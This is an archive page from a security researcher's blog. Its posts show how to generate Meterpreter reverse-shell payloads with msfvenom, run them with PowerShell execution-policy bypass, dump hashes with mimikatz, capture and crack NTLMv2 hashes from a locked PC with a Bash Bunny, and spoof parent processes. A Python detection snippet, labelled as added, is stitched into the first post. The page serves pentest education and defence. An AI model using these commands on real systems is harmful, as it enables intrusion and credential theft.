Didier Stevens

Wednesday 16 August 2017

Generating PowerShell Scripts With MSFVenom On Windows

Filed under: Hacking — Didier Stevens @ 20:46

To generate a PowerShell script with msfvenom on Windows, use the command “msfvenom.bat --payload windows/x64/meterpreter_reverse_http --format psh --out meterpreter-64.ps1 LHOST=”:

The payload windows/x64/meterpreter_reverse_http is the Meterpreter payload for 64-bit Windows. Format psh is the format to use to generate a PowerShell script that will execute the payload (formats ps1 and powershell are transform formats, they do not generate a script that executes the payload).

A 32-bit payload is generated with this command “msfvenom.bat --payload windows/meterpreter_reverse_http --format psh --out meterpreter-32.ps1 LHOST=”:

Just as I showed in my post for .exe payloads, we start a handler like this:

Now we need to execute the PowerShell scripts. Just executing “powershell.exe -File meterpreter-64.ps1” will not work:

By default, .ps1 files are not executed. We can execute them by bypassing the policy “powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1”:

In this example, 948 is the handle to the thread created by CreateThread when the payload is executed.

But back in the Metasploit console, you will not see a connection. That’s because the PowerShell process terminates before the Meterpreter payload can fully execute: powershell.exe executes the script, which loads the Meterpreter payload into the powershell process, and then powershell.exe exits, i.e. the powershell process is terminated, and the Meterpreter payload with it.

To give the Meterpreter payload the time to establish a connection, the powershell process must remain alive. We can do this by preventing powershell.exe from exiting with option -NoExit:

Now we get a connection:

This example was for a 64-bit payload on a 64-bit Windows machine.

The same command is used to execute the 32-bit payload on a 32-bit Windows machine (except for the filename, which is meterpreter-32.ps1 in our example).

To execute the 32-bit payload on a 64-bit Windows machine, we need to start 32-bit PowerShell, like this “c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1”:

This gives us 2 sessions:
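As an added defender-side example (not code from the post), here is a small Python triage function that flags the command-line traits this post relies on: ExecutionPolicy Bypass, -NoExit combined with -File, and a PowerShell host started from the SysWOW64 directory on a 64-bit system. The sample command lines are constructed for the example, and the parameter-abbreviation sets are an assumption, not an exhaustive list.

```python
# Constructed sample command lines (not taken from any real log). The first
# three are the invocations discussed in the post; the last is routine admin use.
SAMPLE_CMDLINES = [
    "powershell.exe -File meterpreter-64.ps1",
    "powershell.exe -ExecutionPolicy Bypass -File meterpreter-64.ps1",
    r"c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoExit -File meterpreter-32.ps1",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -File C:\scripts\backup.ps1",
]

# PowerShell accepts unambiguous prefixes of parameter names; these spellings
# are an assumption for this example and are not exhaustive.
_EXEC_POLICY = {"-executionpolicy", "-exec", "-ex", "-ep"}
_NOEXIT = {"-noexit", "-noe"}


def assess_powershell_cmdline(cmdline):
    """Return the indicator names found in one process-creation command line."""
    tokens = cmdline.split()
    if not tokens:
        return []
    image = tokens[0].lower()
    args = [t.lower() for t in tokens[1:]]
    findings = []
    # 32-bit host from the WOW64 directory: needed on a 64-bit machine for a 32-bit payload.
    if "\\syswow64\\" in image:
        findings.append("wow64_powershell")
    # -ExecutionPolicy Bypass (or Unrestricted) lets an unsigned .ps1 file run.
    for i, tok in enumerate(args):
        if tok in _EXEC_POLICY and i + 1 < len(args) and args[i + 1] in {"bypass", "unrestricted"}:
            findings.append("execution_policy_bypass")
    # -NoExit keeps the host alive after the script returns: harmless for interactive
    # use, but together with -File it is what lets an injected thread keep running.
    if any(t in _NOEXIT for t in args) and "-file" in args:
        findings.append("noexit_with_file")
    return findings


def triage(cmdlines):
    """Map each command line to its indicators; lines with none are left out."""
    result = {}
    for cmd in cmdlines:
        findings = assess_powershell_cmdline(cmd)
        if findings:
            result[cmd] = findings
    return result


if __name__ == "__main__":
    for cmd, findings in triage(SAMPLE_CMDLINES).items():
        print(findings, cmd)
```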

Monday 14 August 2017

Using Metasploit On Windows

Filed under: Hacking — Didier Stevens @ 10:17

In my previous post “Reading Memory Of 64-bit Processes” I used the Windows version of Metasploit so that I could do all tests with a single machine: running the Meterpreter client and server on the same machine.

The Metasploit framework requires administrative rights to install on Windows; by default it installs in the c:\metasploit folder. Your AV on your Windows machine will generate alerts when you install and use Metasploit on Windows, so make sure to create the proper exceptions.

General remark: Metasploit on Windows is slower than on Linux, be patient.

I use MSFVenom (c:\metasploit\msfvenom.bat) to create 32-bit and 64-bit executables to inject the Meterpreter payload.

Command “msfvenom.bat --help” will show you all options:

Command “msfvenom.bat --list payloads” will show you all payloads:

Command “msfvenom.bat --help-formats” will show you all output formats:

Executable formats will generate programs and scripts, while transform formats will just produce the payload. More on this later.

I use msfvenom.bat to create a 32-bit and 64-bit executable with the meterpreter_reverse_http payload.

Here is the command for 32-bit: “msfvenom.bat --payload windows/meterpreter_reverse_http --format exe --out meterpreter-32.exe LHOST=”.

Since I did not specify the platform and architecture, msfvenom will choose these based on the payload I selected.

Format exe is the executable format for .exe files.

windows/meterpreter_reverse_http is the Windows 32-bit version of the meterpreter_reverse_http payload. This payload takes several options, which can be enumerated with the following command:

“msfvenom.bat --payload windows/meterpreter_reverse_http --payload-options”

LHOST is the only required option that has no default value. I use LHOST= because I’m doing everything on the same machine, so the loopback address can be used.

Here is the command for 64-bit: “msfvenom.bat --payload windows/x64/meterpreter_reverse_http --format exe --out meterpreter-64.exe LHOST=”.

Now that I created my 2 executables, I can start Metasploit’s console and use them.

I start c:\metasploit\console.bat (this will take a couple of minutes on Windows).

And then I start the Meterpreter server with these commands:

use exploit/multi/handler
set payload windows/meterpreter_reverse_http
set lhost

The Metasploit handler is now waiting for connections. I start meterpreter-64.exe as administrator, because I want it to have SYSTEM access (I ran msfvenom and console as normal user).

When started, meterpreter-64.exe will connect to the handler and wait for instructions (the process will not exit). We can see this connection here:

With the sessions command, we can see all callbacks:

And here we select session 1 to interact with Meterpreter:

From here on, we can use this Meterpreter shell:




Sunday 13 August 2017

Reading Memory Of 64-bit Processes

Filed under: Hacking — Didier Stevens @ 23:21

When you read the memory of a 64-bit process, you have to make sure to read it from a 64-bit process. A 32-bit process can not use the documented Windows API to read the memory of a 64-bit process.

Here is an example using Metasploit with Meterpreter’s mimikatz module:

When using 32-bit meterpreter/mimikatz command msv to extract hashes from 64-bit Windows, we get an error: “0x0000012b Only part of a ReadProcessMemory or WriteProcessMemory request was completed”. This error occurs when a 32-bit process wants to read or write memory from a 64-bit process.

If we take a second look at the result of command “load mimikatz”, we see a warning: [!] Loaded x86 Mimikatz on a x64 architecture.

We need to run Meterpreter in a 64-bit process to access memory of a 64-bit process (like LSA):

Here we have no Windows API error anymore, but still no hashes. This is because Meterpreter’s mimikatz module is an older version (1.0) that can not extract hashes from the latest versions of Windows. Here we are using a 64-bit fully patched Windows 7 machine.

Command “mimikatz_command -f version” confirms module mimikatz’s version:

When we use this version on a 64-bit unpatched Windows 7 SP1 machine, we get hashes:

Maybe you recognize the LM and NTLM hashes of the empty string (AAD3B435B51404EEAAD3B435B51404EE and 31D6CFE0D16AE931B73C59D7E0C089C0).

Saturday 15 July 2017

Mimikatz Videos

Filed under: Hacking — Didier Stevens @ 21:01

I created more mimikatz videos.

And if you didn’t see it, @gentilkiwi created a BSOD command for minesweeper ;-).

mimikatz and protected processes:

mimikatz RPC mode:

And mimikatz skeleton command:

Monday 10 July 2017

Select Parent Process from VBA

Filed under: Forensics,Hacking,maldoc,Malware,My Software — Didier Stevens @ 0:00

Years ago I wrote a C program to create a new process with a chosen parent process: selectmyparent. And recently I showed what process monitor and system monitor report when you use this tool.

Starting a new process with a chosen parent process can be done from VBA too, as shown in this video (I’m not sharing the VBA code):

Sunday 9 July 2017

Video: mimikatz & minesweeper

Filed under: Entertainment,Hacking — Didier Stevens @ 16:07

@gentilkiwi’s mimikatz has a minesweeper module with command infos. This command will show you where the mines are in minesweeper.

Saturday 8 July 2017

Video: mimikatz & !bsod

Filed under: Entertainment,Hacking — Didier Stevens @ 21:53

After the mimikatz !bsod blogpost, here’s the video:

Friday 7 July 2017

Quickpost: mimikatz !bsod

Filed under: Entertainment,Hacking,Quickpost — Didier Stevens @ 20:31

I’m going through the mimikatz source code and I’m finding all kind of gems :-).

Here is one of them, but be careful, do this only on a machine where you won’t mind losing data, because this will crash the machine.

There’s a mimikatz driver command to initiate a Blue Screen of Death: !bsod

Here I’m using mimikatz as administrator on a Windows 7 machine (because I’m not a fan of the new BSOD introduced with Windows 8):


Quickpost info

Thursday 6 April 2017

Quickpost: Using My Bash Bunny To “Snag Creds From A Locked Machine”

Filed under: Bash Bunny,Entertainment,Hacking,Hardware,Quickpost — Didier Stevens @ 23:22

FYI: This is nothing new, I’m just documenting how I configured and used my new Bash Bunny for “SNAGGING CREDS FROM LOCKED MACHINES” as Mubix explained.

After setting up my Bash Bunny, I used it on a locked Windows 10 machine to get netNTLMv2 hashes, here is the video:


After collecting the hashes, I can recover them from the Bash Bunny:

I put my Bash Bunny into arming mode: put the switch in position 3 (switch position closest to the USB connector). I insert my Bash Bunny in my Windows machine. The removable storage on the Bash Bunny gets assigned drive letter D: on my machine.

Inside folder D:\loot\quickcreds there are folders created each time I use this payload on a machine. Here is the content for the Windows 10 machine I collected hashes from (DESKTOP-DEMO):

File Proxy-Auth-NTLMv2- contains the hashes:

These can be cracked, for example with John The Ripper:

Here is what I did to setup my Bash Bunny after unboxing it:

First I updated the payloads on my Bash Bunny from the GitHub repository.

I put my Bash Bunny into arming mode: put the switch in position 3 (switch position closest to the USB connector). I insert my Bash Bunny in my Windows machine. The removable storage on the Bash Bunny gets assigned drive letter D: on my machine.

I copy the content of the GitHub repository payloads folder to the payloads folder on the Bash Bunny: d:\payloads\ (overwriting existing files).

To install the tools: I copy D:\payloads\library\tools_installer\ to D:\payloads\switch1\ (overwriting existing files).

I eject the Bash Bunny, put the switch in position 1 (payload 1, switch position closest to the LED). I insert the Bash Bunny in my Windows machine, and wait for a white solid LED: this takes about 10 seconds.

I eject the Bash Bunny, put the switch in position 3 and re-insert it into my Windows machine.

Then I set the QuickCreds payload (responder) as payload 2 on my Bash Bunny: copy D:\payloads\library\QuickCreds\ to D:\payloads\switch2\ (overwriting existing files).

I eject the Bash Bunny, put the switch in position 2 (payload 2, switch position in the middle) and insert it into my test Windows machine. After some time, the Bash Bunny displays a green LED, indicating that hashes were collected.

Quickpost info

Monday 20 March 2017

That Is Not My Child Process!

Filed under: Forensics,Hacking — Didier Stevens @ 0:00

Years ago I released a tool to create a Windows process with selected parent process: SelectMyParent.

You can not blindly trust parent-child process relations in Windows: the parent of a process can be different from the process that created that process.

Here I start selectmyparent from cmd.exe to launch notepad.exe with parent explorer.exe (PID 328):

Process Explorer reports explorer.exe as the parent (and not selectmyparent.exe):

Process Monitor also reports explorer.exe as the parent:

If we look in the call stack of the process creation of notepad.exe, we see 2 frames (6 and 7) with unknown modules:

We should see entries in the call stack for explorer.exe if notepad.exe was started by explorer.exe, but we don’t.

The <unknown> module is actually selectmyparent.exe.

0x11b1461 is the address of the instruction after the call to _main in ___tmainCRTStartup in selectmyparent.exe.

0x11b12a8 is the address of the instruction after the call to CreateProcessW in _main in selectmyparent.exe.


System Monitor also reports explorer.exe as the parent:

Finally, Volatility’s pstree command also reports explorer.exe as the parent:
